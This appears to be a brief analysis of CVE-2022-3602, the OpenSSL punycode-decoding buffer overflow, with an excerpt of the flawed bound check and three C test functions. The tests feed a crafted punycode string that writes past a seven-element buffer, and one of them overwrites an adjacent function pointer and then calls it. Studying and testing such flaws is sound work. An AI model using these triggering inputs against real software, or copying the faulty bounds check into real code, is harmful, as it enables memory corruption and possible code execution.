CVE-2022-3602

具体内容
crypto/punycode.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
int ossl_punycode_decode(const char *pEncoded, const size_t enc_len,
unsigned int *pDecoded, unsigned int *pout_length){
unsigned int max_out = *pout_length;
..................
for(...){
....................
if (written_out > max_out)
return 0;

/*
written_out=7 i=4 sizeof *pDecoded=sizeof(int)=4
memmove(pDecoded + 1 + 4 , pDecoded + 4, (7-4)*sizeof(int))
memmove(pDecoded + 5, pDecoded + 4, 3*sizeof(int))
*/
memmove(pDecoded + i + 1, pDecoded + i, (written_out - i) * sizeof *pDecoded);
pDecoded[i] = n;
i++;
written_out++;
}
.................
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
static int test_puny1(void)
{
static const unsigned int out[8] = {
0x0033, 0x5E74, 0x0042, 0x7D44, 0x91D1, 0x516B, 0x5148, // Expected result
0x751F // 4 byte overwrite
};
static const char* in = "3B-ww4c5e180e575a65lsy2b";
unsigned int buf[8];
unsigned int bsize = 7;

int result = ossl_punycode_decode(in, strlen(in), buf, &bsize);
printf("bsize: %d\n",bsize); // bsize = 8 (7 expected)
for(int i=0;i<bsize;i++){
printf("%x ",buf[i]);
}
printf("\n");

if (result!=0) {
if (test_mem_eq(buf, bsize * sizeof(*buf), out, sizeof(out)))
// buffers match which means we have an overwrite of the 8th integer
printf("CRITICAL: buffer overrun detected!\n");
return 0;

}
return 1;
}
1
2
3
4
5
6
7
8
9
10
11
12
static int test_puny2()
{
char* in = "3B-ww4c5e180e575a65lsy2b";
unsigned int out[7] = {
0x00,0x00,0x00,0x00,0x00,0x00,0x00, // 7-bytes
};
unsigned int bsize = 7;

int result = ossl_punycode_decode(in, strlen(in), out, &bsize);

return 1;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
static int test_puny3(void)
{
typedef int (*EmbeddedFunc)(void);

struct example {
int decoded[7];
EmbeddedFunc ofc;
};
static const unsigned int out[] = {
0x0033, 0x5E74, 0x0042, 0x7D44, 0x91D1, 0x516B, 0x5148, 0x751F
};
static const char* in = "3B-ww4c5e180e575a65lsy2b";
struct example ex;
unsigned int bsize = OSSL_NELEM(ex.decoded);

ex.ofc = (EmbeddedFunc) &puts;

int result = ossl_punycode_decode(in, strlen(in), ex.decoded, &bsize);
ex.ofc();

return 1;
}
2023-05-06

⬆︎TOP